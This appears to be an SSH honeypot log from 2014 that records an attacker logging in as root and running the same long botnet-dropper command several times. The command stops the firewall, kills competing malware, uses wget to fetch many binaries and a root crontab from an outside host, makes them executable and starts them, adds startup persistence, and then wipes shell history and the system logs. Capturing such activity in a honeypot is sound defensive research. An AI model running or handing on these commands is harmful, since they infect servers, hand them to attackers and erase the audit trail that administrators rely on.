dir atdd.* cd /etc;rm -rf dir ksapd.* cd /etc;rm -rf dir kysapd.* cd /etc;rm -rf dir sksapd.* cd /etc;rm -rf dir skysapd.* cd /etc;rm -rf dir xfsdx.* cd /etc;rm -rf dir sfewfesfs cd /etc;rm -rf dir gfhjrtfyhuf cd /etc;rm -rf dir rewgtf3er4t cd /etc;rm -rf dir fdsfsfvff cd /etc;rm -rf dir smarvtd cd /etc;rm -rf dir whitptabil cd /etc;rm -rf dir gdmorpen cd /etc;rm -rf dir sfewfesfs.* cd /etc;rm -rf dir gfhjrtfyhuf.* cd /etc;rm -rf dir rewgtf3er4t.* cd /etc;rm -rf dir fdsfsfvff.* cd /etc;rm -rf dir smarvtd.* cd /etc;rm -rf dir whitptabil.* cd /etc;rm -rf dir gdmorpen.* cd /etc;rm -rf dir nhgbhhj.* cd /tmp;rm -rf dir 1.* cd /tmp;rm -rf dir 2.* cd /tmp;rm -rf dir 3.* cd /tmp;rm -rf dir 4.* cd /tmp;rm -rf dir 5.* cd /tmp;rm -rf dir jdhe cd /tmp;rm -rf dir jdhe.* cd /var/spool/cron; rm -rf dir root.* cd /var/spool/cron; rm -rf dir root cd /var/spool/cron/crontabs; rm -rf dir root.* cd /var/spool/cron/crontabs; rm -rf dir root cd /var/spool/cron ;wget -c http://www.frade8c.com:9162/root cd /var/spool/cron/crontabs ;wget -c http://www.frade8c.com:9162/root yes|mv /tmp/root /var/spool/cron yes|mv /tmp/root /var/spool/cron/crontabs cd /tmp;wget -c http://www.frade8c.com:9162/1 cd /tmp;wget -c http://www.frade8c.com:9162/2 cd /tmp;wget -c http://www.frade8c.com:9162/3 cd /tmp;wget -c http://www.frade8c.com:9162/4 cd /tmp;wget -c http://www.frade8c.com:9162/5 cd /tmp;wget -c http://www.frade8c.com:9162/jdhe cd /etc;wget -c http://www.frade8c.com:9162/sfewfesfs cd /etc;wget -c http://www.frade8c.com:9162/gfhjrtfyhuf cd /etc;wget -c http://www.frade8c.com:9162/rewgtf3er4t cd /etc;wget -c http://www.frade8c.com:9162/fdsfsfvff cd /etc;wget -c http://www.frade8c.com:9162/smarvtd cd /etc;wget -c http://www.frade8c.com:9162/whitptabil cd /etc;wget -c http://www.frade8c.com:9162/gdmorpen cd /etc;wget -c http://www.frade8c.com:9162/nhgbhhj cd /etc;wget -c http://www.frade8c.com:9162/byv832 cd /tmp;chmod 7777 1 cd /tmp;chmod 7777 2 cd /tmp;chmod 7777 3 cd /tmp;chmod 7777 4 cd /tmp;chmod 7777 5 cd /tmp;chmod 7777 jdhe cd /etc;chmod 7777 nhgbhhj cd /etc;chmod 7777 byv832 cd /etc;chmod 7777 sfewfesfs cd /etc;chmod 7777 gfhjrtfyhuf cd /etc;chmod 7777 rewgtf3er4t cd /etc;chmod 7777 fdsfsfvff cd /etc;chmod 7777 smarvtd cd /etc;chmod 7777 whitptabil cd /etc;chmod 7777 gdmorpen cd /tmp;chmod 7777 nhgbhhj cd /tmp;chmod 7777 byv832 cd /tmp;chmod 7777 sfewfesfs cd /tmp;chmod 7777 gfhjrtfyhuf cd /tmp;chmod 7777 rewgtf3er4t cd /tmp;chmod 7777 fdsfsfvff cd /tmp;chmod 7777 smarvtd cd /tmp;chmod 7777 whitptabil cd /tmp;chmod 7777 gdmorpen cd /tmp;./1 cd /tmp;./2 cd /tmp;./3 cd /tmp;./4 cd /tmp;./5 cd /tmp;./jdhe nohup /etc/sfewfesfs > /dev/null 2>&1& nohup /etc/gfhjrtfyhuf > /dev/null 2>&1& nohup /etc/rewgtf3er4t > /dev/null 2>&1& nohup /etc/fdsfsfvff > /dev/null 2>&1& nohup /etc/smarvtd > /dev/null 2>&1& nohup /etc/whitptabil > /dev/null 2>&1& nohup /etc/gdmorpen > /dev/null 2>&1& nohup /etc/nhgbhhj > /dev/null 2>&1& nohup /etc/byv832 > /dev/null 2>&1& nohup /tmp/sfewfesfs > /dev/null 2>&1& nohup /tmp/gfhjrtfyhuf > /dev/null 2>&1& nohup /tmp/rewgtf3er4t > /dev/null 2>&1& nohup /tmp/fdsfsfvff > /dev/null 2>&1& nohup /tmp/smarvtd > /dev/null 2>&1& nohup /tmp/whitptabil > /dev/null 2>&1& nohup /tmp/gdmorpen > /dev/null 2>&1& nohup /tmp/nhgbhhj > /dev/null 2>&1& nohup /tmp/byv832 > /dev/null 2>&1& echo "cd /tmp;./sfewfesfs" >> /etc/rc.local echo "cd /tmp;./gfhjrtfyhuf" >> /etc/rc.local echo "cd /tmp;./rewgtf3er4t" >> /etc/rc.local echo "cd /tmp;./fdsfsfvff" >> /etc/rc.local echo "cd /tmp;./smarvtd" >> /etc/rc.local echo "cd /tmp;./whitptabil" >> /etc/rc.local echo "cd /tmp;./gdmorpen" >> /etc/rc.local echo "cd /etc;./sfewfesfs" >> /etc/rc.local echo "cd /etc;./gfhjrtfyhuf" >> /etc/rc.local echo "cd /etc;./rewgtf3er4t" >> /etc/rc.local echo "cd /etc;./fdsfsfvff" >> /etc/rc.local echo "cd /etc;./smarvtd" >> /etc/rc.local echo "cd /etc;./whitptabil" >> /etc/rc.local echo "cd /etc;./gdmorpen" >> /etc/rc.local echo "unset MAILCHECK" >> /etc/profile cd /etc;chattr +i sfewfesfs rm -rf /root/.bash_history touch /root/.bash_history history -r cd /var/log > dmesg cd /var/log > auth.log cd /var/log > alternatives.log cd /var/log > boot.log cd /var/log > btmp cd /var/log > cron cd /var/log > cups cd /var/log > daemon.log cd /var/log > dpkg.log cd /var/log > faillog cd /var/log > kern.log cd /var/log > lastlog cd /var/log > maillog cd /var/log > user.log cd /var/log > Xorg.x.log cd /var/log > anaconda.log cd /var/log > yum.log cd /var/log > secure cd /var/log > wtmp cd /var/log > utmp cd /var/log > messages cd /var/log > spooler cd /var/log > sudolog cd /var/log > aculog cd /var/log > access-log cd /root > .bash_history history -c" 2014-10-17 03:55:06+0100 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,6,122.225.109.214] Opening TTY log: log/tty/20141017-035506-103.log 2014-10-17 03:55:06+0100 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,6,122.225.109.214] Running exec command "/etc/init.d/iptables stop echo "nameserver 8.8.8.8" >> /etc/resolv.conf echo "nameserver 8.8.4.4" >> /etc/resolv.conf apt-get -y install wget yum -y install wget chmod 7777 / etc killall -9 .IptabLes killall -9 nfsd4 killall -9 profild.key cd /etc;rm -rf dir fake.cfg killall -9 nfsd killall -9 DDosl killall -9 lengchao32 killall -9 b26 killall -9 khelper killall -9 Bill killall -9 n26 killall -9 007 killall -9 codelove killall -9 32 killall -9 m32 killall -9 m64 killall -9 64 killall -9 83BOT killall -9 82BOT killall -9 dos64 killall -9 dos32 killall -9 new6 killall -9 new4 killall -9 node24 killall -9 mimi killall -9 nodeJR-1 killall -9 freeBSD killall -9 ksapdd killall -9 106 killall -9 09 killall -9 xsw killall -9 syslogd killall -9 skysapdd killall -9 cupsddd killall -9 ksapd killall -9 atddd killall -9 xfsdxd killall -9 sfewfesfs killall -9 gfhjrtfyhuf killall -9 rewgtf3er4t killall -9 fdsfsfvff killall -9 smarvtd killall -9 whitptabil killall -9 gdmorpen cd /etc;chattr -i 66 cd /root; chmod 7777 / etc killall -9 minerd killall -9 syn killall -9 joudckfr killall -9 www killall -9 log killall -9 .IptabLes killall -9 .IptabLex killall -9 .Mm2 killall -9 acpid killall -9 m64 killall -9 ./QQ killall -9 aabb killall -9 g3 killall -9 S99local killall -9 3 killall -9 pm killall -9 qweasd killall -9 tangtang killall -9 imap-login killall -9 xudp killall -9 sshpa killall -9 008 killall -9 txma killall -9 mrdos64.b00 killall -9 mrdos32.b00 killall -9 kkpklp killall -9 kiilp killall -9 xin1 killall -9 jibateng killall -9 syscore.sh killall -9 syscore.sh killall -9 syscore.sh killall -9 .mimeo killall -9 .mimeo killall -9 .mimeo killall -9 .mimeop killall -9 .task1 killall -9 .mimeop killall -9 .IptabLes killall -9 .IptabLex killall -9 .IptabLes killall -9 .IptabLex killall -9 .IptabLes killall -9 .IptabLex killall -9 .IptabLes killall -9 .IptabLex cd /root;rm -rf dir nohup.out cd /etc;rm -rf dir fake.cfg cd /etc;rm -rf dir cupsddd.* cd /etc;rm -rf dir atddd.* cd /etc;rm -rf dir ksapdd.* cd /etc;rm -rf dir kysapdd.* cd /etc;rm -rf dir sksapdd.* cd /etc;rm -rf dir skysapdd.* cd /etc;rm -rf dir xfsdxd.* cd /etc;rm -rf dir fake.cfg cd /etc;rm -rf dir cupsdd.* cd /etc;rm -rf dir atdd.* cd /etc;rm -rf dir ksapd.* cd /etc;rm -rf dir kysapd.* cd /etc;rm -rf dir sksapd.* cd /etc;rm -rf dir skysapd.* cd /etc;rm -rf dir xfsdx.* cd /etc;rm -rf dir sfewfesfs cd /etc;rm -rf dir gfhjrtfyhuf cd /etc;rm -rf dir rewgtf3er4t cd /etc;rm -rf dir fdsfsfvff cd /etc;rm -rf dir smarvtd cd /etc;rm -rf dir whitptabil cd /etc;rm -rf dir gdmorpen cd /etc;rm -rf dir sfewfesfs.* cd /etc;rm -rf dir gfhjrtfyhuf.* cd /etc;rm -rf dir rewgtf3er4t.* cd /etc;rm -rf dir fdsfsfvff.* cd /etc;rm -rf dir smarvtd.* cd /etc;rm -rf dir whitptabil.* cd /etc;rm -rf dir gdmorpen.* cd /etc;rm -rf dir nhgbhhj.* cd /tmp;rm -rf dir 1.* cd /tmp;rm -rf dir 2.* cd /tmp;rm -rf dir 3.* cd /tmp;rm -rf dir 4.* cd /tmp;rm -rf dir 5.* cd /tmp;rm -rf dir jdhe cd /tmp;rm -rf dir jdhe.* cd /var/spool/cron; rm -rf dir root.* cd /var/spool/cron; rm -rf dir root cd /var/spool/cron/crontabs; rm -rf dir root.* cd /var/spool/cron/crontabs; rm -rf dir root cd /var/spool/cron ;wget -c http://www.frade8c.com:9162/root cd /var/spool/cron/crontabs ;wget -c http://www.frade8c.com:9162/root yes|mv /tmp/root /var/spool/cron yes|mv /tmp/root /var/spool/cron/crontabs cd /tmp;wget -c http://www.frade8c.com:9162/1 cd /tmp;wget -c http://www.frade8c.com:9162/2 cd /tmp;wget -c http://www.frade8c.com:9162/3 cd /tmp;wget -c http://www.frade8c.com:9162/4 cd /tmp;wget -c http://www.frade8c.com:9162/5 cd /tmp;wget -c http://www.frade8c.com:9162/jdhe cd /etc;wget -c http://www.frade8c.com:9162/sfewfesfs cd /etc;wget -c http://www.frade8c.com:9162/gfhjrtfyhuf cd /etc;wget -c http://www.frade8c.com:9162/rewgtf3er4t cd /etc;wget -c http://www.frade8c.com:9162/fdsfsfvff cd /etc;wget -c http://www.frade8c.com:9162/smarvtd cd /etc;wget -c http://www.frade8c.com:9162/whitptabil cd /etc;wget -c http://www.frade8c.com:9162/gdmorpen cd /etc;wget -c http://www.frade8c.com:9162/nhgbhhj cd /etc;wget -c http://www.frade8c.com:9162/byv832 cd /tmp;chmod 7777 1 cd /tmp;chmod 7777 2 cd /tmp;chmod 7777 3 cd /tmp;chmod 7777 4 cd /tmp;chmod 7777 5 cd /tmp;chmod 7777 jdhe cd /etc;chmod 7777 nhgbhhj cd /etc;chmod 7777 byv832 cd /etc;chmod 7777 sfewfesfs cd /etc;chmod 7777 gfhjrtfyhuf cd /etc;chmod 7777 rewgtf3er4t cd /etc;chmod 7777 fdsfsfvff cd /etc;chmod 7777 smarvtd cd /etc;chmod 7777 whitptabil cd /etc;chmod 7777 gdmorpen cd /tmp;chmod 7777 nhgbhhj cd /tmp;chmod 7777 byv832 cd /tmp;chmod 7777 sfewfesfs cd /tmp;chmod 7777 gfhjrtfyhuf cd /tmp;chmod 7777 rewgtf3er4t cd /tmp;chmod 7777 fdsfsfvff cd /tmp;chmod 7777 smarvtd cd /tmp;chmod 7777 whitptabil cd /tmp;chmod 7777 gdmorpen cd /tmp;./1 cd /tmp;./2 cd /tmp;./3 cd /tmp;./4 cd /tmp;./5 cd /tmp;./jdhe nohup /etc/sfewfesfs > /dev/null 2>&1& nohup /etc/gfhjrtfyhuf > /dev/null 2>&1& nohup /etc/rewgtf3er4t > /dev/null 2>&1& nohup /etc/fdsfsfvff > /dev/null 2>&1& nohup /etc/smarvtd > /dev/null 2>&1& nohup /etc/whitptabil > /dev/null 2>&1& nohup /etc/gdmorpen > /dev/null 2>&1& nohup /etc/nhgbhhj > /dev/null 2>&1& nohup /etc/byv832 > /dev/null 2>&1& nohup /tmp/sfewfesfs > /dev/null 2>&1& nohup /tmp/gfhjrtfyhuf > /dev/null 2>&1& nohup /tmp/rewgtf3er4t > /dev/null 2>&1& nohup /tmp/fdsfsfvff > /dev/null 2>&1& nohup /tmp/smarvtd > /dev/null 2>&1& nohup /tmp/whitptabil > /dev/null 2>&1& nohup /tmp/gdmorpen > /dev/null 2>&1& nohup /tmp/nhgbhhj > /dev/null 2>&1& nohup /tmp/byv832 > /dev/null 2>&1& echo "cd /tmp;./sfewfesfs" >> /etc/rc.local echo "cd /tmp;./gfhjrtfyhuf" >> /etc/rc.local echo "cd /tmp;./rewgtf3er4t" >> /etc/rc.local echo "cd /tmp;./fdsfsfvff" >> /etc/rc.local echo "cd /tmp;./smarvtd" >> /etc/rc.local echo "cd /tmp;./whitptabil" >> /etc/rc.local echo "cd /tmp;./gdmorpen" >> /etc/rc.local echo "cd /etc;./sfewfesfs" >> /etc/rc.local echo "cd /etc;./gfhjrtfyhuf" >> /etc/rc.local echo "cd /etc;./rewgtf3er4t" >> /etc/rc.local echo "cd /etc;./fdsfsfvff" >> /etc/rc.local echo "cd /etc;./smarvtd" >> /etc/rc.local echo "cd /etc;./whitptabil" >> /etc/rc.local echo "cd /etc;./gdmorpen" >> /etc/rc.local echo "unset MAILCHECK" >> /etc/profile cd /etc;chattr +i sfewfesfs rm -rf /root/.bash_history touch /root/.bash_history history -r cd /var/log > dmesg cd /var/log > auth.log cd /var/log > alternatives.log cd /var/log > boot.log cd /var/log > btmp cd /var/log > cron cd /var/log > cups cd /var/log > daemon.log cd /var/log > dpkg.log cd /var/log > faillog cd /var/log > kern.log cd /var/log > lastlog cd /var/log > maillog cd /var/log > user.log cd /var/log > Xorg.x.log cd /var/log > anaconda.log cd /var/log > yum.log cd /var/log > secure cd /var/log > wtmp cd /var/log > utmp cd /var/log > messages cd /var/log > spooler cd /var/log > sudolog cd /var/log > aculog cd /var/log > access-log cd /root > .bash_history history -c" 2014-10-17 03:55:06+0100 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,6,122.225.109.214] CMD: /etc/init.d/iptables stop echo "nameserver 8.8.8.8" >> /etc/resolv.conf echo "nameserver 8.8.4.4" >> /etc/resolv.conf apt-get -y install wget yum -y install wget chmod 7777 / etc killall -9 .IptabLes killall -9 nfsd4 killall -9 profild.key cd /etc;rm -rf dir fake.cfg killall -9 nfsd killall -9 DDosl killall -9 lengchao32 killall -9 b26 killall -9 khelper killall -9 Bill killall -9 n26 killall -9 007 killall -9 codelove killall -9 32 killall -9 m32 killall -9 m64 killall -9 64 killall -9 83BOT killall -9 82BOT killall -9 dos64 killall -9 dos32 killall -9 new6 killall -9 new4 killall -9 node24 killall -9 mimi killall -9 nodeJR-1 killall -9 freeBSD killall -9 ksapdd killall -9 106 killall -9 09 killall -9 xsw killall -9 syslogd killall -9 skysapdd killall -9 cupsddd killall -9 ksapd killall -9 atddd killall -9 xfsdxd killall -9 sfewfesfs killall -9 gfhjrtfyhuf killall -9 rewgtf3er4t killall -9 fdsfsfvff killall -9 smarvtd killall -9 whitptabil killall -9 gdmorpen cd /etc;chattr -i 66 cd /root; chmod 7777 / etc killall -9 minerd killall -9 syn killall -9 joudckfr killall -9 www killall -9 log killall -9 .IptabLes killall -9 .IptabLex killall -9 .Mm2 killall -9 acpid killall -9 m64 killall -9 ./QQ killall -9 aabb killall -9 g3 killall -9 S99local killall -9 3 killall -9 pm killall -9 qweasd killall -9 tangtang killall -9 imap-login killall -9 xudp killall -9 sshpa killall -9 008 killall -9 txma killall -9 mrdos64.b00 killall -9 mrdos32.b00 killall -9 kkpklp killall -9 kiilp killall -9 xin1 killall -9 jibateng killall -9 syscore.sh killall -9 syscore.sh killall -9 syscore.sh killall -9 .mimeo killall -9 .mimeo killall -9 .mimeo killall -9 .mimeop killall -9 .task1 killall -9 .mimeop killall -9 .IptabLes killall -9 .IptabLex killall -9 .IptabLes killall -9 .IptabLex killall -9 .IptabLes killall -9 .IptabLex killall -9 .IptabLes killall -9 .IptabLex cd /root;rm -rf dir nohup.out cd /etc;rm -rf dir fake.cfg cd /etc;rm -rf dir cupsddd.* cd /etc;rm -rf dir atddd.* cd /etc;rm -rf dir ksapdd.* cd /etc;rm -rf dir kysapdd.* cd /etc;rm -rf dir sksapdd.* cd /etc;rm -rf dir skysapdd.* cd /etc;rm -rf dir xfsdxd.* cd /etc;rm -rf dir fake.cfg cd /etc;rm -rf dir cupsdd.* cd /etc;rm -rf dir atdd.* cd /etc;rm -rf dir ksapd.* cd /etc;rm -rf dir kysapd.* cd /etc;rm -rf dir sksapd.* cd /etc;rm -rf dir skysapd.* cd /etc;rm -rf dir xfsdx.* cd /etc;rm -rf dir sfewfesfs cd /etc;rm -rf dir gfhjrtfyhuf cd /etc;rm -rf dir rewgtf3er4t cd /etc;rm -rf dir fdsfsfvff cd /etc;rm -rf dir smarvtd cd /etc;rm -rf dir whitptabil cd /etc;rm -rf dir gdmorpen cd /etc;rm -rf dir sfewfesfs.* cd /etc;rm -rf dir gfhjrtfyhuf.* cd /etc;rm -rf dir rewgtf3er4t.* cd /etc;rm -rf dir fdsfsfvff.* cd /etc;rm -rf dir smarvtd.* cd /etc;rm -rf dir whitptabil.* cd /etc;rm -rf dir gdmorpen.* cd /etc;rm -rf dir nhgbhhj.* cd /tmp;rm -rf dir 1.* cd /tmp;rm -rf dir 2.* cd /tmp;rm -rf dir 3.* cd /tmp;rm -rf dir 4.* cd /tmp;rm -rf dir 5.* cd /tmp;rm -rf dir jdhe cd /tmp;rm -rf dir jdhe.* cd /var/spool/cron; rm -rf dir root.* cd /var/spool/cron; rm -rf dir root cd /var/spool/cron/crontabs; rm -rf dir root.* cd /var/spool/cron/crontabs; rm -rf dir root cd /var/spool/cron ;wget -c http://www.frade8c.com:9162/root cd /var/spool/cron/crontabs ;wget -c http://www.frade8c.com:9162/root yes|mv /tmp/root /var/spool/cron yes|mv /tmp/root /var/spool/cron/crontabs cd /tmp;wget -c http://www.frade8c.com:9162/1 cd /tmp;wget -c http://www.frade8c.com:9162/2 cd /tmp;wget -c http://www.frade8c.com:9162/3 cd /tmp;wget -c http://www.frade8c.com:9162/4 cd /tmp;wget -c http://www.frade8c.com:9162/5 cd /tmp;wget -c http://www.frade8c.com:9162/jdhe cd /etc;wget -c http://www.frade8c.com:9162/sfewfesfs cd /etc;wget -c http://www.frade8c.com:9162/gfhjrtfyhuf cd /etc;wget -c http://www.frade8c.com:9162/rewgtf3er4t cd /etc;wget -c http://www.frade8c.com:9162/fdsfsfvff cd /etc;wget -c http://www.frade8c.com:9162/smarvtd cd /etc;wget -c http://www.frade8c.com:9162/whitptabil cd /etc;wget -c http://www.frade8c.com:9162/gdmorpen cd /etc;wget -c http://www.frade8c.com:9162/nhgbhhj cd /etc;wget -c http://www.frade8c.com:9162/byv832 cd /tmp;chmod 7777 1 cd /tmp;chmod 7777 2 cd /tmp;chmod 7777 3 cd /tmp;chmod 7777 4 cd /tmp;chmod 7777 5 cd /tmp;chmod 7777 jdhe cd /etc;chmod 7777 nhgbhhj cd /etc;chmod 7777 byv832 cd /etc;chmod 7777 sfewfesfs cd /etc;chmod 7777 gfhjrtfyhuf cd /etc;chmod 7777 rewgtf3er4t cd /etc;chmod 7777 fdsfsfvff cd /etc;chmod 7777 smarvtd cd /etc;chmod 7777 whitptabil cd /etc;chmod 7777 gdmorpen cd /tmp;chmod 7777 nhgbhhj cd /tmp;chmod 7777 byv832 cd /tmp;chmod 7777 sfewfesfs cd /tmp;chmod 7777 gfhjrtfyhuf cd /tmp;chmod 7777 rewgtf3er4t cd /tmp;chmod 7777 fdsfsfvff cd /tmp;chmod 7777 smarvtd cd /tmp;chmod 7777 whitptabil cd /tmp;chmod 7777 gdmorpen cd /tmp;./1 cd /tmp;./2 cd /tmp;./3 cd /tmp;./4 cd /tmp;./5 cd /tmp;./jdhe nohup /etc/sfewfesfs > /dev/null 2>&1& nohup /etc/gfhjrtfyhuf > /dev/null 2>&1& nohup /etc/rewgtf3er4t > /dev/null 2>&1& nohup /etc/fdsfsfvff > /dev/null 2>&1& nohup /etc/smarvtd > /dev/null 2>&1& nohup /etc/whitptabil > /dev/null 2>&1& nohup /etc/gdmorpen > /dev/null 2>&1& nohup /etc/nhgbhhj > /dev/null 2>&1& nohup /etc/byv832 > /dev/null 2>&1& nohup /tmp/sfewfesfs > /dev/null 2>&1& nohup /tmp/gfhjrtfyhuf > /dev/null 2>&1& nohup /tmp/rewgtf3er4t > /dev/null 2>&1& nohup /tmp/fdsfsfvff > /dev/null 2>&1& nohup /tmp/smarvtd > /dev/null 2>&1& nohup /tmp/whitptabil > /dev/null 2>&1& nohup /tmp/gdmorpen > /dev/null 2>&1& nohup /tmp/nhgbhhj > /dev/null 2>&1& nohup /tmp/byv832 > /dev/null 2>&1& echo "cd /tmp;./sfewfesfs" >> /etc/rc.local echo "cd /tmp;./gfhjrtfyhuf" >> /etc/rc.local echo "cd /tmp;./rewgtf3er4t" >> /etc/rc.local echo "cd /tmp;./fdsfsfvff" >> /etc/rc.local echo "cd /tmp;./smarvtd" >> /etc/rc.local echo "cd /tmp;./whitptabil" >> /etc/rc.local echo "cd /tmp;./gdmorpen" >> /etc/rc.local echo "cd /etc;./sfewfesfs" >> /etc/rc.local echo "cd /etc;./gfhjrtfyhuf" >> /etc/rc.local echo "cd /etc;./rewgtf3er4t" >> /etc/rc.local echo "cd /etc;./fdsfsfvff" >> /etc/rc.local echo "cd /etc;./smarvtd" >> /etc/rc.local echo "cd /etc;./whitptabil" >> /etc/rc.local echo "cd /etc;./gdmorpen" >> /etc/rc.local echo "unset MAILCHECK" >> /etc/profile cd /etc;chattr +i sfewfesfs rm -rf /root/.bash_history touch /root/.bash_history history -r cd /var/log > dmesg cd /var/log > auth.log cd /var/log > alternatives.log cd /var/log > boot.log cd /var/log > btmp cd /var/log > cron cd /var/log > cups cd /var/log > daemon.log cd /var/log > dpkg.log cd /var/log > faillog cd /var/log > kern.log cd /var/log > lastlog cd /var/log > maillog cd /var/log > user.log cd /var/log > Xorg.x.log cd /var/log > anaconda.log cd /var/log > yum.log cd /var/log > secure cd /var/log > wtmp cd /var/log > utmp cd /var/log > messages cd /var/log > spooler cd /var/log > sudolog cd /var/log > aculog cd /var/log > access-log cd /root > .bash_history history -c 2014-10-17 03:55:06+0100 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,6,122.225.109.214] Command not found: /etc/init.d/iptables stop echo "nameserver 8.8.8.8" >> /etc/resolv.conf echo "nameserver 8.8.4.4" >> /etc/resolv.conf apt-get -y install wget yum -y install wget chmod 7777 / etc killall -9 .IptabLes killall -9 nfsd4 killall -9 profild.key cd /etc 2014-10-17 03:55:06+0100 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,6,122.225.109.214] Command found: rm -rf dir fake.cfg killall -9 nfsd killall -9 DDosl killall -9 lengchao32 killall -9 b26 killall -9 khelper killall -9 Bill killall -9 n26 killall -9 007 killall -9 codelove killall -9 32 killall -9 m32 killall -9 m64 killall -9 64 killall -9 83BOT k 2014-10-17 03:55:06+0100 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,6,122.225.109.214] sending close 0 2014-10-17 03:55:06+0100 [SSHService ssh-userauth on HoneyPotTransport,7,122.225.109.214] root trying auth none 2014-10-17 03:55:07+0100 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,6,122.225.109.214] remote close 2014-10-17 03:55:07+0100 [HoneyPotTransport,6,122.225.109.214] connection lost 2014-10-17 03:55:07+0100 [SSHService ssh-userauth on HoneyPotTransport,7,122.225.109.214] root trying auth keyboard-interactive 2014-10-17 03:55:07+0100 [SSHService ssh-userauth on HoneyPotTransport,7,122.225.109.214] login attempt [root/admin] succeeded 2014-10-17 03:55:07+0100 [SSHService ssh-userauth on HoneyPotTransport,7,122.225.109.214] root authenticated with keyboard-interactive 2014-10-17 03:55:07+0100 [SSHService ssh-userauth on HoneyPotTransport,7,122.225.109.214] starting service ssh-connection 2014-10-17 03:55:08+0100 [SSHService ssh-connection on HoneyPotTransport,7,122.225.109.214] got channel session request 2014-10-17 03:55:08+0100 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,7,122.225.109.214] channel open 2014-10-17 03:55:08+0100 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,7,122.225.109.214] executing command "/etc/init.d/iptables stop echo "nameserver 8.8.8.8" >> /etc/resolv.conf echo "nameserver 8.8.4.4" >> /etc/resolv.conf apt-get -y install wget yum -y install wget chmod 7777 / etc killall -9 .IptabLes killall -9 nfsd4 killall -9 profild.key cd /etc;rm -rf dir fake.cfg killall -9 nfsd killall -9 DDosl killall -9 lengchao32 killall -9 b26 killall -9 khelper killall -9 Bill killall -9 n26 killall -9 007 killall -9 codelove killall -9 32 killall -9 m32 killall -9 m64 killall -9 64 killall -9 83BOT killall -9 82BOT killall -9 dos64 killall -9 dos32 killall -9 new6 killall -9 new4 killall -9 node24 killall -9 mimi killall -9 nodeJR-1 killall -9 freeBSD killall -9 ksapdd killall -9 106 killall -9 09 killall -9 xsw killall -9 syslogd killall -9 skysapdd killall -9 cupsddd killall -9 ksapd killall -9 atddd killall -9 xfsdxd killall -9 sfewfesfs killall -9 gfhjrtfyhuf killall -9 rewgtf3er4t killall -9 fdsfsfvff killall -9 smarvtd killall -9 whitptabil killall -9 gdmorpen cd /etc;chattr -i 66 cd /root; chmod 7777 / etc killall -9 minerd killall -9 syn killall -9 joudckfr killall -9 www killall -9 log killall -9 .IptabLes killall -9 .IptabLex killall -9 .Mm2 killall -9 acpid killall -9 m64 killall -9 ./QQ killall -9 aabb killall -9 g3 killall -9 S99local killall -9 3 killall -9 pm killall -9 qweasd killall -9 tangtang killall -9 imap-login killall -9 xudp killall -9 sshpa killall -9 008 killall -9 txma killall -9 mrdos64.b00 killall -9 mrdos32.b00 killall -9 kkpklp killall -9 kiilp killall -9 xin1 killall -9 jibateng killall -9 syscore.sh killall -9 syscore.sh killall -9 syscore.sh killall -9 .mimeo killall -9 .mimeo killall -9 .mimeo killall -9 .mimeop killall -9 .task1 killall -9 .mimeop killall -9 .IptabLes killall -9 .IptabLex killall -9 .IptabLes killall -9 .IptabLex killall -9 .IptabLes killall -9 .IptabLex killall -9 .IptabLes killall -9 .IptabLex cd /root;rm -rf dir nohup.out cd /etc;rm -rf dir fake.cfg cd /etc;rm -rf dir cupsddd.* cd /etc;rm -rf dir atddd.* cd /etc;rm -rf dir ksapdd.* cd /etc;rm -rf dir kysapdd.* cd /etc;rm -rf dir sksapdd.* cd /etc;rm -rf dir skysapdd.* cd /etc;rm -rf dir xfsdxd.* cd /etc;rm -rf dir fake.cfg cd /etc;rm -rf dir cupsdd.* cd /etc;rm -rf dir atdd.* cd /etc;rm -rf dir ksapd.* cd /etc;rm -rf dir kysapd.* cd /etc;rm -rf dir sksapd.* cd /etc;rm -rf dir skysapd.* cd /etc;rm -rf dir xfsdx.* cd /etc;rm -rf dir sfewfesfs cd /etc;rm -rf dir gfhjrtfyhuf cd /etc;rm -rf dir rewgtf3er4t cd /etc;rm -rf dir fdsfsfvff cd /etc;rm -rf dir smarvtd cd /etc;rm -rf dir whitptabil cd /etc;rm -rf dir gdmorpen cd /etc;rm -rf dir sfewfesfs.* cd /etc;rm -rf dir gfhjrtfyhuf.* cd /etc;rm -rf dir rewgtf3er4t.* cd /etc;rm -rf dir fdsfsfvff.* cd /etc;rm -rf dir smarvtd.* cd /etc;rm -rf dir whitptabil.* cd /etc;rm -rf dir gdmorpen.* cd /etc;rm -rf dir nhgbhhj.* cd /tmp;rm -rf dir 1.* cd /tmp;rm -rf dir 2.* cd /tmp;rm -rf dir 3.* cd /tmp;rm -rf dir 4.* cd /tmp;rm -rf dir 5.* cd /tmp;rm -rf dir jdhe cd /tmp;rm -rf dir jdhe.* cd /var/spool/cron; rm -rf dir root.* cd /var/spool/cron; rm -rf dir root cd /var/spool/cron/crontabs; rm -rf dir root.* cd /var/spool/cron/crontabs; rm -rf dir root cd /var/spool/cron ;wget -c http://www.frade8c.com:9162/root cd /var/spool/cron/crontabs ;wget -c http://www.frade8c.com:9162/root yes|mv /tmp/root /var/spool/cron yes|mv /tmp/root /var/spool/cron/crontabs cd /tmp;wget -c http://www.frade8c.com:9162/jdhe cd /etc;wget -c http://www.frade8c.com:9162/sfewfesfs cd /etc;wget -c http://www.frade8c.com:9162/gfhjrtfyhuf cd /etc;wget -c http://www.frade8c.com:9162/rewgtf3er4t cd /etc;wget -c http://www.frade8c.com:9162/fdsfsfvff cd /etc;wget -c http://www.frade8c.com:9162/smarvtd cd /etc;wget -c http://www.frade8c.com:9162/whitptabil cd /etc;wget -c http://www.frade8c.com:9162/gdmorpen cd /etc;wget -c http://www.frade8c.com:9162/nhgbhhj cd /etc;wget -c http://www.frade8c.com:9162/byv832 cd /tmp;chmod 7777 jdhe cd /etc;chmod 7777 nhgbhhj cd /etc;chmod 7777 byv832 cd /etc;chmod 7777 sfewfesfs cd /etc;chmod 7777 gfhjrtfyhuf cd /etc;chmod 7777 rewgtf3er4t cd /etc;chmod 7777 fdsfsfvff cd /etc;chmod 7777 smarvtd cd /etc;chmod 7777 whitptabil cd /etc;chmod 7777 gdmorpen cd /tmp;chmod 7777 nhgbhhj 